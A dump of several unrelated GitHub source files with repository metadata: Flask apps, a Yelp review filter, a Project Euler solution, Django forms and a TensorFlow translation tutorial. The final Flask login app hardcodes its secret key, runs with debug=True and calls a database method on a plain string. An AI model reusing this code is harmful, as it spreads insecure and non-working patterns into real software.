import numpy as np
import sklearn
from sklearn.preprocessing import StandardScaler
app = Flask(__name__)
model = pickle.load(open('random_forest_regression_model.pkl', 'rb'))
@app.route('/',methods=['GET'])
def Home():
return render_template('index.html')
standard_to = StandardScaler()
@app.route("/predict", methods=['POST'])
def predict():
Fuel_Type_Diesel=0
if request.method == 'POST':
Year = int(request.form['Year'])
Present_Price=float(request.form['Present_Price'])
Kms_Driven=int(request.form['Kms_Driven'])
Kms_Driven2=np.log(Kms_Driven)
Owner=int(request.form['Owner'])
Fuel_Type_Petrol=request.form['Fuel_Type_Petrol']
if(Fuel_Type_Petrol=='Petrol'):
Fuel_Type_Petrol=1
Fuel_Type_Diesel=0
else:
Fuel_Type_Petrol=0
Fuel_Type_Diesel=1
Year=2020-Year
Seller_Type_Individual=request.form['Seller_Type_Individual']
if(Seller_Type_Individual=='Individual'):
Seller_Type_Individual=1
else:
Seller_Type_Individual=0
Transmission_Mannual=request.form['Transmission_Mannual']
if(Transmission_Mannual=='Mannual'):
Transmission_Mannual=1
else:
Transmission_Mannual=0
prediction=model.predict([[Present_Price,Kms_Driven2,Owner,Year,Fuel_Type_Diesel,Fuel_Type_Petrol,Seller_Type_Individual,Transmission_Mannual]])
output=round(prediction[0],2)
if output<0:
return render_template('index.html',prediction_texts="Sorry you cannot sell this car")
else:
return render_template('index.html',prediction_text="You Can Sell The Car at {}".format(output))
else:
return render_template('index.html')
if __name__=="__main__":
app.run(debug=True)
|
[
"noreply@github.com"
] |
Praveen366.noreply@github.com
|
2e4668d8c193a9ddbf9a0634f94a7dd600cbbaf1
|
2b1e34f363cca19c673e3f487074684efd1af868
|
/reviews and stars extraction.py
|
5a8f7c85dc88cf9574755ad51f3cca2e9990f1d8
|
[] |
no_license
|
Celty3910/how-consumer-reviews-affect-your-star-ratings
|
14f54bb1192c666725dd4b5bebc7adc4d26af32a
|
e6d68cb55bdb8ea49c7a9adb28c1fd7fb863871f
|
refs/heads/master
| 2020-03-10T23:20:26.418674
| 2018-05-02T02:51:00
| 2018-05-02T02:51:00
| 129,639,073
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,801
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 14:01:29 2018
@author: Lacey
"""
from IPython.core.interactiveshell import InteractiveShell
InteractiveShell.ast_node_interactivity = "all"
# the following part of code may takes at least half an hour to 3 hours depends on your machime.
# we don't run it over here
# but the out put is included in the folder
import subprocess
import json
import csv
import re
import codecs
import time
start_time = time.time()
from nltk.stem import WordNetLemmatizer
from nltk.corpus import wordnet
from sklearn.preprocessing import normalize
from nltk.corpus import stopwords
############################################################
# NOTES:
# split big json into smaller chunks
# split -b 800mb review.json
#
# merge files into one
# cat *.csv >merged.csv
###################################################################################
# Step I. Filtering out the FOOD service related text reviews
##################################################################################
# we manully extract out the key words appeared in the food service categories
food_dict = ['Fast Food', 'Delis', 'Sandwiches', 'Soup', 'Steakhouses',
'Breakfast & Brunch', 'Seafood', 'Sushi Bars', 'Donuts',
'Ice Cream & Frozen Yogurt', 'Cupcakes', 'Chicken Wings', 'Asian Fusion',
'Mexican', 'Chinese', 'American', 'Japanese', 'Canadian', 'French',
'Waffles','Juice','Bars','Smoothies','Hot Dogs','Fish','Chips',
'Bagels','Salad','Soup','Ramen','Vegetarian','Barbeque','Gluten-Free',
'Buffets','Cafes','Caterers']
data = {}
business_id =[]
categories = []
i = 0
print('\n')
print('Start reading business.json')
print('......')
print('\n')
with codecs.open('business.json','rU','utf-8') as json_file:
try:
for line in json_file:
line_contents = json.loads(line)
business_id.append(line_contents['business_id'])
categories.append(line_contents['categories'])
i += 1
#print (line_contents['business_id'], line_contents['categories'])
except UnicodeDecodeError:
print("failed to parse data")
pass
print('finish reading business.json')
print('\n')
# make a dictionary that business_id as keys and
# the corresponding categories as values
data = dict(zip(business_id, categories))
food_data = {}
food_id = []
#food_categories = []
# filter out all FOOD related services
for business_id, categories in data.items():
for elem in food_dict:
if elem in categories:
food_id.append(business_id)
#food_categories.append(categories)
#food_data = dict(zip(food_id, food_categories))
print (len(food_id))
review_busi_id =[]
review_text = []
stars = []
#j = 0
print('Start reading reviews.json')
print('......')
# extract only the text review and its corresponding text review part
with codecs.open('review.json','rU','utf-8') as json_file:
try:
for l in json_file:
l_contents = json.loads(l)
review_busi_id.append(l_contents['business_id'])
review_text.append(l_contents['text'])
stars.append(l_contents['stars'])
#j += 1
#print (j, l_contents['text'])
#print ("\n")
#print ('size: ', len(review_text))
except UnicodeDecodeError:
print("failed to parse data")
pass
print('\n')
print('finish reading reviews.json')
print('\n')
print('Start saving food_reviews.csv')
print('......')
# dictionary with b_id as keys and b_text as values
review_data = dict(zip(review_busi_id, review_text))
review_stars = dict(zip(review_busi_id, stars))
f_1 = csv.writer(open('food_reviews_1.csv','w'))
f_2 = csv.writer(open('food_reviews_2.csv','w'))
#output1 = []
idx = 0
# only FOOD-service related reviews
for id in food_id:
for review_busi_id, review_text in review_data.items():
if review_busi_id == id:
print (idx, review_busi_id)
f_1.writerow([review_busi_id,review_text])
#output1.append(review_text)
print (idx, review_text)
idx += 1
print ('\n')
for review_bid, stars in review_stars.items():
    if review_bid == id:
        print (idx, review_bid)
        f_2.writerow([review_bid, stars])
        #output1.append(review_text)
        print (idx, stars)
        #idx += 1
print ('\n')
#f.close()
#print output1
#print('\n')
#print('finish saving food_reviews.csv')
#print('\n')
|
[
"noreply@github.com"
] |
Celty3910.noreply@github.com
|
68c64467b3fce1da542079095af7de59d545a2b5
|
55e24943297bb106b2f431b0e6f5990131772ea0
|
/backend/api/v1/__init__.py
|
39fcc71a89e295c07dcbea637c82276899f896ad
|
[] |
no_license
|
maangulo12/starter-kit
|
4464ed04dedd4a6e2c554da2a98f2da09674a33b
|
a78a05f38d9c89b9a91b9bf8521b3518f8c02154
|
refs/heads/master
| 2023-05-10T21:28:31.416774
| 2019-11-14T04:24:48
| 2019-11-14T04:24:48
| 70,211,873
| 10
| 2
| null | 2023-05-02T18:29:06
| 2016-10-07T03:15:01
|
Python
|
UTF-8
|
Python
| false
| false
| 178
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
backend.api.v1
~~~~~~~~~~~~~~
This package contains the API v1 endpoints of this application.
"""
URL = '/api/v1'
|
[
"maangulo12@gmail.com"
] |
maangulo12@gmail.com
|
137b6286f0943e71c7aecacf034efc1a6a9116bd
|
f34447a590fb160a09b95c03aea2106d8521acaf
|
/004.py
|
8a16579aae3903285394ee5caa17c86a0ff6b157
|
[] |
no_license
|
skd1729/Project-Euler-Solutions
|
1f4506bacc061b395af784d6253119564a908e41
|
e9a1a3dca636fbaad7bb2faac095dd40597a5078
|
refs/heads/master
| 2020-12-30T09:37:40.472933
| 2017-09-24T22:36:20
| 2017-09-24T22:36:20
| 100,424,843
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 204
|
py
|
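# Project Euler 4: find the largest palindrome that is a product of two 3-digit numbers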
p = []
for x in range(100, 1000):
    # multiples of x from x*100 up to x*999, i.e. x*y for every 3-digit y
    for prod in range(x * 100, x * 1000, x):
        digits = [int(d) for d in str(prod)]
        if digits == digits[::-1]:
            p.append(prod)
p.sort()
print(p[-1])
|
[
"noreply@github.com"
] |
skd1729.noreply@github.com
|
b7a522982fc0326be5a4bac3a315f3ae636c11ee
|
631fd4f51e66d0a6dbbe65f2a9191f6cb1a29946
|
/serv.py
|
f976c43d9a2bb9de0a071f0cf0d190e0fb47ebfd
|
[] |
no_license
|
sorryiambizzy/web_laba4
|
4db3c2a91b2572c02a50aa35b23a1c36bcb56d15
|
bf3e425f56ea44d4589d52a0b23eaede0780aa4f
|
refs/heads/master
| 2021-05-06T15:31:34.825761
| 2017-12-08T19:23:37
| 2017-12-08T19:23:37
| 113,581,541
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,406
|
py
|
from webob import Request, Response
from jinja2 import Environment, FileSystemLoader
assets = [
'app.js',
'react.js',
'leaflet.js',
'D3.js',
'moment.js',
'math.js',
'main.css',
'bootstrap.css',
'normalize.css',
]
css = []
js = []
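# split the asset list into scripts and stylesheets by file extension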
for element in assets:
element_split = element.split('.')
if element_split[1] == 'js':
js.append(element)
elif element_split[1] == 'css':
css.append(element)
class WsgiTopBottomMiddleware(object):
def __init__(self, app):
self.app = app
def __call__(self, environ, start_response):
response = self.app(environ, start_response)
if isinstance(response, bytes):
    response = response.decode()
if '<head>' in response and '<body>' in response:
    html, head = response.split('<head>')
    datahead, body = head.split('</head>')
    head1, bodytag = body.split('<body>')
    databody, end = bodytag.split('</body>')
    # assumption: re-emit the extracted head and body content around the rest of the page
    yield (html + datahead + databody + end).encode()
else:
    yield response.encode()
def app(environ, start_response):
response_code = '200 OK'
response_type = ('Content-Type', 'text/HTML')
start_response(response_code, [response_type])
return ''''''
app = WsgiTopBottomMiddleware(app)
request = Request.blank('/index.html')
env = Environment(loader=FileSystemLoader('.'))
template = env.get_template('index.html')
print(template.render(javascripts=js, styles=css))
print(request.get_response(app))
|
[
"noreply@github.com"
] |
sorryiambizzy.noreply@github.com
|
eb62ed975e122b3739a6c76235afc7ec58481491
|
65a42ef4a18e0054bc2d0822b073a9253e9427f2
|
/backend/api/views.py
|
3274e8571e441bba23632fdcb505a6b2d4a8a83e
|
[] |
no_license
|
hjalti/maulrater
|
bcca76146d947adb710951035caeefafcb989e34
|
5669612116e32e21bced9b157ad9241290d90c65
|
refs/heads/master
| 2021-08-14T10:18:57.033475
| 2019-12-05T12:24:21
| 2019-12-05T12:24:21
| 210,585,605
| 0
| 0
| null | 2021-08-11T12:28:14
| 2019-09-24T11:26:32
|
Vue
|
UTF-8
|
Python
| false
| false
| 352
|
py
|
from rest_framework import generics
from api.serializers import RatingSerializer, RestaurantSerializer
from api.models import Restaurant
class RestaurantList(generics.ListAPIView):
queryset = Restaurant.objects.all()
serializer_class = RestaurantSerializer
class RatingCreate(generics.CreateAPIView):
serializer_class = RatingSerializer
|
[
"hjalti@syndis.is"
] |
hjalti@syndis.is
|
6dd3d7603490a5f2fdf91d1d397aeaca760bcf15
|
c68670233d27ed9c8be58df8f177b7ba047d5762
|
/ETF/bank/regression-testing/ETF_Test_Parameters.py
|
ae64a0f7b353bfc295dd028b8afc60d37a1b8eb7
|
[] |
no_license
|
chrisboyd/3311_Software_Design
|
cddb0a35aea5b24a37a3485263774af5af20acca
|
0f2103440199847644b360db2e4da680cc055b25
|
refs/heads/master
| 2022-04-12T20:43:44.344652
| 2020-04-05T14:33:19
| 2020-04-05T14:33:19
| 236,079,001
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,976
|
py
|
#!/usr/bin/env python3
# Specify the directory (relative or absolute) where the acceptance test
# files are. If nothing is added, current directory is used.
# WARNING: While absolute paths are supported, the oracle may not play nicely
# with them.
root = "../tests"
# Specify files or directories (relative to root) of the acceptance tests.
# NOTE: Tests can not be named test.expected.txt
# NOTE: To run all tests in the root directory, use [""] as the test.
# WARNING: Does not support partial file names with wildcards ie at*.txt
acceptance_tests = [
"acceptance/instructor",
"acceptance/student"
]
# acceptance_tests = ["acceptance-tests/at00.txt"
# ,"acceptance-tests/at01.txt"]
# Should regression testing continue on warnings? If this is set to False,
# regression testing will exit.
ignore_warnings = True
# Should the regression testing proceed with a list of expected files, or the
# oracle?
# When this flag is set True, the value of 'oracle' is ignored.
is_expected = False
# Specify where you put the oracle.
oracle = "../oracle.exe"
# Specify the path of the executable built from your project.
executable = "../EIFGENs/bank/W_code/bank"
# The above is an OSX executable
# Linux executable for students shall be called: oracle.exe
# Should the program only print tests that do not pass
print_only_errors = True
# Should the program format the output so it could easily be diffed:
# examples include "meld", "diff -y", etc.
# If left blank will format output in a generic way
format_for_diff = "meld"
# Set true if you want the comparison to be tolerant on white spaces and empty
# lines.
# WARNING: While every attempt has been made to make the output return the same
# result as the grading script, there are no guarantees. It is strongly advised
# that you submit a program that passes with the flag set to False.
is_tolerant_on_white_spaces = False
|
[
"chrisboyd360@gmail.com"
] |
chrisboyd360@gmail.com
|
d0197e1460b1523cbdd200578cad1bcb1e586cd2
|
ecc658489d9b99228964f55e19674619bdd07e34
|
/models/forms.py
|
831b13a7fdea52189e69ec4d7d98e7a9574f444c
|
[] |
no_license
|
nkhanhng/test
|
d211feafb8c3ae75262565d676851681517e2d2f
|
40e68eac8a57d8767a2794ec01a6ac2efe433960
|
refs/heads/master
| 2021-09-10T22:27:11.658235
| 2018-04-03T11:27:12
| 2018-04-03T11:27:12
| 126,017,972
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 261
|
py
|
from wtforms import Form, StringField, SelectField
class ProductSearchForm(Form):
choices = [('Brand', 'Brand'),
('Product', 'Product'),]
select = SelectField('Tìm kiếm điện thoại:', choices=choices)
search = StringField('')
|
[
"khanhmatden123@gmail.com"
] |
khanhmatden123@gmail.com
|
8f1fbeb8067359a027901401c270d62040d1f6b2
|
aa3f2ce318c57d7ba44a4465342915a9c40ec812
|
/socialauthapp/profile.py
|
cdb08a818bbe245bf0eb92c32e4a4a243e514d5f
|
[
"BSD-2-Clause-Views"
] |
permissive
|
vencax/feincms-auth-app
|
25f7b59183c3cba8cf0aaffe85b1990b301ae724
|
ba4fad4b7dd0c58311aac791ec462c814e8f7660
|
refs/heads/master
| 2021-01-01T18:47:56.492396
| 2012-06-28T12:08:50
| 2012-06-28T12:08:50
| 4,223,398
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,230
|
py
|
'''
Created on Jun 18, 2012
@author: vencax
'''
from django import forms
from django.contrib.auth.forms import UserChangeForm
from django.contrib.auth.models import User
class MyUserChangeForm(forms.ModelForm):
class Meta(UserChangeForm.Meta):
model = User
fields = ('username', 'first_name', 'last_name', 'email',)
class ProfileEditForm(object):
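    """Composite profile form: the base user form plus any forms registered by other apps; validation and saving are delegated to all of them."""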
_forms = set()
@classmethod
def register_form(cls, form):
    cls._forms.add(form)
def __init__(self, **kwargs):
self._instances = []
self._addInstance(MyUserChangeForm, **kwargs)
for fClass in self._forms:
self._addInstance(fClass, **kwargs)
def _addInstance(self, fClass, **kwargs):
rec = (fClass._meta.model._meta.verbose_name,
fClass(**dict(kwargs)))
self._instances.append(rec)
def get_forms(self):
return self._instances
def is_valid(self):
valid = True
for _, f in self._instances:
fval = f.is_valid()
if valid and not fval:
valid = False
return valid
def save(self):
for _, f in self._instances:
f.save()
|
[
"vencax77@gmail.com"
] |
vencax77@gmail.com
|
c528f1a96a884ed2425f1c35dfcff713356953d5
|
afa4e8d5d99f968c0429b2ec2712221008139130
|
/bin/pip
|
6593de6f958534a5c93de0f85b3889680af86f88
|
[] |
no_license
|
Delboy82/relayboard_googleassistant
|
a291996c6a2957139081f1a9bfc4248795e7ee24
|
5c4328e5deb0ba5570538f4bc7c7f1cede8a6cd7
|
refs/heads/master
| 2023-01-01T23:27:20.190600
| 2020-11-01T10:31:44
| 2020-11-01T10:31:44
| 309,069,805
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 262
|
#!/home/pi/projects/googleassistant/relayboard_google/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from pip._internal import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"Richardbarton82@hotmail.com"
] |
Richardbarton82@hotmail.com
|
|
97968f80ad7c70241d93fc92dbf9851e963caad3
|
05ef7c8bda9af31dbb23824750e5eb420fba3522
|
/renders/ValueStatistic.py
|
2715b07fc5dfe482c3990529052a5a8b9a955ab6
|
[] |
no_license
|
drianclark/api-wrapper-generator
|
86f68c294554cc67e5fdef6e491cde7c0a9349cc
|
c07b0ff26ac018c416dcfae347f0a91ea69dc18c
|
refs/heads/master
| 2022-12-02T19:43:29.622879
| 2020-08-25T17:07:36
| 2020-08-25T17:07:36
| 279,889,605
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 584
|
py
|
class ValueStatistic:
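    """Wraps a decoded JSON object and exposes its fields as attributes with accessor methods."""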
def __init__(self, dict):
for k, v in dict.items():
setattr(self, "_" + k, v)
keys = list(dict.keys())
try:
self._id = dict["@id"]
except:
pass
def label(self):
try:
value = self._label
except AttributeError:
value = None
return value
|
[
"dreiclark@gmail.com"
] |
dreiclark@gmail.com
|
1c3fd6d04e52d2914fd4bc5213d8805313a85793
|
5bd4289ce406b2a390dde8a11effd1959680a271
|
/trans.py
|
281f457929009c688d254c7dd44b23d81df1113e
|
[] |
no_license
|
appleboys/Tensorflow2.0_cmntoEng_byJiLinCheng
|
9cdf3b760b9d9efc90620ba810335b51f59682cb
|
e929463f12c5a20a63b5f5f941f2f27eeef581d1
|
refs/heads/main
| 2023-05-02T17:34:08.789697
| 2021-05-13T16:29:39
| 2021-05-13T16:29:39
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 12,908
|
py
|
from __future__ import absolute_import, division, print_function, unicode_literals
import tensorflow as tf
import matplotlib.pyplot as plt
import matplotlib.ticker as ticker
from sklearn.model_selection import train_test_split
import unicodedata
import re
import numpy as np
import os
import io
import time
# Download the dataset
path_to_zip = tf.keras.utils.get_file(
'spa-eng.zip', origin='http://storage.googleapis.com/download.tensorflow.org/data/spa-eng.zip',
extract=True)
path_to_file = os.path.dirname(path_to_zip) + "/spa-eng/spa.txt"
# Convert unicode text to ascii
def unicode_to_ascii(s):
return ''.join(c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn')
def preprocess_sentence(w):
w = unicode_to_ascii(w.lower().strip())
# Insert a space between a word and the punctuation that follows it
# e.g.: "he is a boy." => "he is a boy ."
# see: https://stackoverflow.com/questions/3645931/python-padding-punctuation-with-white-spaces-keeping-punctuation
w = re.sub(r"([?.!,¿])", r" \1 ", w)
w = re.sub(r'[" "]+', " ", w)
# Replace every character with a space, except (a-z, A-Z, ".", "?", "!", ",")
w = re.sub(r"[^a-zA-Z?.!,¿]+", " ", w)
w = w.rstrip().strip()
# Add start and end tokens to the sentence
# so the model knows when to start and stop predicting
w = '<start> ' + w + ' <end>'
print(w)
return w
en_sentence = u"May I borrow this book?"
sp_sentence = u"¿Puedo tomar prestado este libro?"
print(preprocess_sentence(en_sentence))
print(preprocess_sentence(sp_sentence).encode('utf-8'))
# 1. Remove accents
# 2. Clean the sentences
# 3. Return word pairs in the format: [ENGLISH, SPANISH]
def create_dataset(path, num_examples):
lines = io.open(path, encoding='UTF-8').read().strip().split('\n')
word_pairs = [[preprocess_sentence(w) for w in l.split('\t')] for l in lines[:num_examples]]
return zip(*word_pairs)
def max_length(tensor):
return max(len(t) for t in tensor)
def tokenize(lang):
lang_tokenizer = tf.keras.preprocessing.text.Tokenizer(
filters='')
lang_tokenizer.fit_on_texts(lang)
tensor = lang_tokenizer.texts_to_sequences(lang)
tensor = tf.keras.preprocessing.sequence.pad_sequences(tensor,
padding='post')
return tensor, lang_tokenizer
def load_dataset(path, num_examples=None):
# Create cleaned input/output pairs
targ_lang, inp_lang = create_dataset(path, num_examples)
input_tensor, inp_lang_tokenizer = tokenize(inp_lang)
target_tensor, targ_lang_tokenizer = tokenize(targ_lang)
return input_tensor, target_tensor, inp_lang_tokenizer, targ_lang_tokenizer
# Try experimenting with different dataset sizes
num_examples = 10000
input_tensor, target_tensor, inp_lang, targ_lang = load_dataset(path_to_file, num_examples)
# Compute the maximum length (max_length) of the target tensors
max_length_targ, max_length_inp = max_length(target_tensor), max_length(input_tensor)
# Split into training and validation sets with an 80/20 ratio (author's open questions: validation/test split, shape of the training curve, 1e-08 vs. the current 1e-07 precision, trunc)
input_tensor_train, input_tensor_val, target_tensor_train, target_tensor_val = train_test_split(input_tensor,target_tensor,test_size=0.2)
BUFFER_SIZE=len(input_tensor_train)
BATCH_SIZE = 64
steps_per_epoch = len(input_tensor_train) // BATCH_SIZE
embedding_dim = 256
units = 1024
vocab_inp_size = len(inp_lang.word_index) + 1
vocab_tar_size = len(targ_lang.word_index) + 1
dataset = tf.data.Dataset.from_tensor_slices((input_tensor_train, target_tensor_train)).shuffle(BUFFER_SIZE)
dataset = dataset.batch(BATCH_SIZE, drop_remainder=True)
class Encoder(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, enc_units, batch_sz):
super(Encoder, self).__init__()
self.batch_sz = batch_sz
self.enc_units = enc_units
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(self.enc_units,
return_sequences=True,
return_state=True,
recurrent_initializer='glorot_uniform')
def call(self, x, hidden):
x = self.embedding(x)
output, state = self.gru(x, initial_state=hidden)
return output, state
def initialize_hidden_state(self):
return tf.zeros((self.batch_sz, self.enc_units))
encoder = Encoder(vocab_inp_size, embedding_dim, units, BATCH_SIZE)
class BahdanauAttention(tf.keras.layers.Layer):
def __init__(self, units):
super(BahdanauAttention, self).__init__()
self.W1 = tf.keras.layers.Dense(units)
self.W2 = tf.keras.layers.Dense(units)
self.V = tf.keras.layers.Dense(1)
def call(self, query, values):
# hidden state shape == (batch size, hidden size)
# hidden_with_time_axis shape == (batch size, 1, hidden size)
# this is done to broadcast the addition when computing the score
hidden_with_time_axis = tf.expand_dims(query, 1)
# score shape == (batch size, max length, 1)
# we get 1 on the last axis because we apply the score to self.V
# before applying self.V the tensor shape is (batch size, max length, units)
score = self.V(tf.nn.tanh(
self.W1(values) + self.W2(hidden_with_time_axis)))
# attention_weights shape == (batch size, max length, 1)
attention_weights = tf.nn.softmax(score, axis=1)
# context_vector shape after the sum == (batch size, hidden size)
context_vector = attention_weights * values
context_vector = tf.reduce_sum(context_vector, axis=1)
return context_vector, attention_weights
attention_layer = BahdanauAttention(10)
class Decoder(tf.keras.Model):
def __init__(self, vocab_size, embedding_dim, dec_units, batch_sz):
super(Decoder, self).__init__()
self.batch_sz = batch_sz
self.dec_units = dec_units
self.embedding = tf.keras.layers.Embedding(vocab_size, embedding_dim)
self.gru = tf.keras.layers.GRU(self.dec_units,
return_sequences=True,
return_state=True,
recurrent_initializer='glorot_uniform')
self.fc = tf.keras.layers.Dense(vocab_size)
# used for attention
self.attention = BahdanauAttention(self.dec_units)
def call(self, x, hidden, enc_output):
# enc_output shape == (batch size, max length, hidden size)
context_vector, attention_weights = self.attention(hidden, enc_output)
# x shape after passing through the embedding layer == (batch size, 1, embedding dim)
x = self.embedding(x)
# x shape after concatenation == (batch size, 1, embedding dim + hidden size)
x = tf.concat([tf.expand_dims(context_vector, 1), x], axis=-1)
# pass the concatenated vector to the GRU
output, state = self.gru(x)
# output shape == (batch size * 1, hidden size)
output = tf.reshape(output, (-1, output.shape[2]))
# output shape == (batch size, vocab)
x = self.fc(output)
return x, state, attention_weights
decoder = Decoder(vocab_tar_size, embedding_dim, units, BATCH_SIZE)
optimizer = tf.keras.optimizers.Adam()
loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction='none')
def loss_function(real, pred):
mask = tf.math.logical_not(tf.math.equal(real, 0))
loss_ = loss_object(real, pred)
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
return tf.reduce_mean(loss_)
checkpoint_dir = './training_checkpoints'
checkpoint_prefix = os.path.join(checkpoint_dir, "ckpt")
checkpoint = tf.train.Checkpoint(optimizer=optimizer,
encoder=encoder,
decoder=decoder)
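# one training step over a single batch; tf.function compiles it into a graph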
@tf.function
def train_step(inp, targ, enc_hidden):
loss = 0
with tf.GradientTape() as tape:
enc_output, enc_hidden = encoder(inp, enc_hidden)
dec_hidden = enc_hidden
dec_input = tf.expand_dims([targ_lang.word_index['<start>']] * BATCH_SIZE, 1)
# teacher forcing - feed the target word as the next input
for t in range(1, targ.shape[1]):
# pass the encoder output (enc_output) to the decoder
predictions, dec_hidden, _ = decoder(dec_input, dec_hidden, enc_output)
loss += loss_function(targ[:, t], predictions)
# use teacher forcing
dec_input = tf.expand_dims(targ[:, t], 1)
batch_loss = (loss / int(targ.shape[1]))
variables = encoder.trainable_variables + decoder.trainable_variables
gradients = tape.gradient(loss, variables)
optimizer.apply_gradients(zip(gradients, variables))
return batch_loss
EPOCHS = 1
for epoch in range(EPOCHS):
start = time.time()
enc_hidden = encoder.initialize_hidden_state()
total_loss = 0
for (batch, (inp, targ)) in enumerate(dataset.take(steps_per_epoch)):
batch_loss = train_step(inp, targ, enc_hidden)
total_loss += batch_loss
if batch % 100 == 0:
print('Epoch {} Batch {} Loss {:.4f}'.format(epoch + 1,
batch,
batch_loss.numpy()))
# save a checkpoint of the model every 2 epochs
if (epoch + 1) % 2 == 0:
checkpoint.save(file_prefix=checkpoint_prefix)
print('Epoch {} Loss {:.4f}'.format(epoch + 1,
total_loss / steps_per_epoch))
print('Time taken for 1 epoch {} sec\n'.format(time.time() - start))
def evaluate(sentence):
attention_plot = np.zeros((max_length_targ, max_length_inp))
sentence = preprocess_sentence(sentence)
inputs = [inp_lang.word_index[i] for i in sentence.split(' ')]
inputs = tf.keras.preprocessing.sequence.pad_sequences([inputs],
maxlen=max_length_inp,
padding='post')
inputs = tf.convert_to_tensor(inputs)
result = ''
hidden = [tf.zeros((1, units))]
enc_out, enc_hidden = encoder(inputs, hidden)
dec_hidden = enc_hidden
dec_input = tf.expand_dims([targ_lang.word_index['<start>']], 0)
for t in range(max_length_targ):
predictions, dec_hidden, attention_weights = decoder(dec_input,
dec_hidden,
enc_out)
# store the attention weights for plotting later
attention_weights = tf.reshape(attention_weights, (-1,))
attention_plot[t] = attention_weights.numpy()
predicted_id = tf.argmax(predictions[0]).numpy()
result += targ_lang.index_word[predicted_id] + ' '
if targ_lang.index_word[predicted_id] == '<end>':
return result, sentence, attention_plot
# the predicted ID is fed back into the model
dec_input = tf.expand_dims([predicted_id], 0)
return result, sentence, attention_plot
# function for plotting the attention weights
def plot_attention(attention, sentence, predicted_sentence):
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(1, 1, 1)
ax.matshow(attention, cmap='viridis')
fontdict = {'fontsize': 14}
ax.set_xticklabels([''] + sentence, fontdict=fontdict, rotation=90)
ax.set_yticklabels([''] + predicted_sentence, fontdict=fontdict)
ax.xaxis.set_major_locator(ticker.MultipleLocator(1))
ax.yaxis.set_major_locator(ticker.MultipleLocator(1))
plt.show()
def translate(sentence):
result, sentence, attention_plot = evaluate(sentence)
print('Input: %s' % (sentence))
print('Predicted translation: {}'.format(result))
attention_plot = attention_plot[:len(result.split(' ')), :len(sentence.split(' '))]
plot_attention(attention_plot, sentence.split(' '), result.split(' '))
# restore the latest checkpoint in checkpoint_dir
checkpoint.restore(tf.train.latest_checkpoint(checkpoint_dir))
translate(u'hace mucho frio aqui.')
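# A few extra sample queries for the same Spanish-English setup (illustrative only;
# the output depends on the restored checkpoint and training run):
# translate(u'esta es mi vida.')
# translate(u'¿todavia estan en casa?')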
| ["noreply@github.com"] | appleboys.noreply@github.com |
95931f9ff837861dd3298283478b4a6c2446d4f3 | 204178b68dfeabbca5a76cf72c6c7a4bcbf26dab | /flask_server/app.py | c3c51023bd8be79227fd41e776d0c5ae1e635f26 | [] | no_license | Ex1Kx/Ex1-FlaskTRM2.py | a43b6c891bb0c5bb3493c87e27e4b610aae2f8bc | 9c608d301301843476881d686f00d73135ff3fc1 | refs/heads/main | 2023-07-14T23:41:48.112671 | 2021-09-03T01:12:55 | 2021-09-03T01:12:55 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,992 | py |
from flask import Flask, render_template, request, redirect, url_for, flash
from flask_sqlalchemy import SQLAlchemy
from werkzeug.security import generate_password_hash, check_password_hash
import os
dbdir = "sqlite:///" + os.path.abspath(os.getcwd()) + "/database.db"
app = Flask(__name__)
app.config["SQLALCHEMY_DATABASE_URI"] = dbdir
app.config["SQLALCHEMY_TRACK_MODIFICATIONS"] = False
db = SQLAlchemy(app)
app.secret_key = 'mysecretkey'
class Users(db.Model):
id = db.Column(db.Integer, primary_key=True)
username = db.Column(db.String(50), unique=True, nullable=False)
password = db.Column(db.String(80), nullable=False)
@app.route("/")
def index():
cur = dbdir.cursor()
cur.execute('SELECT * FROM users')
data = cur.fetchall()
print (data)
return render_template("signup.html", users = data)
@app.route("/search")
def search():
nickname = request.args.get("nickname")
user = Users.query.filter_by(username=nickname).first()
if user:
return user.username
return "The user doesn't exist."
@app.route("/signup", methods=["GET", "POST"])
def signup():
if request.method == "POST":
hashed_pw = generate_password_hash(request.form["password"], method="sha256")
new_user = Users(username=request.form["username"], password=hashed_pw)
db.session.add(new_user)
db.session.commit()
        flash('User added successfully')
return redirect(url_for('signup'))
return render_template("signup.html")
@app.route("/login", methods=["GET", "POST"])
def login():
if request.method == "POST":
user = Users.query.filter_by(username=request.form["username"]).first()
if user and check_password_hash(user.password, request.form["password"]):
return "You are logged in"
return "Your credentials are invalid, check and try again."
return render_template("login.html")
if __name__ == "__main__":
db.create_all()
app.run(debug=True)
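# Example requests against the running dev server (assumed default host/port; all values are placeholders):
#   curl -X POST -d "username=alice&password=secret" http://127.0.0.1:5000/signup
#   curl "http://127.0.0.1:5000/search?nickname=alice"
#   curl -X POST -d "username=alice&password=secret" http://127.0.0.1:5000/login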
| ["thenewestekigoh@gmail.com"] | thenewestekigoh@gmail.com |
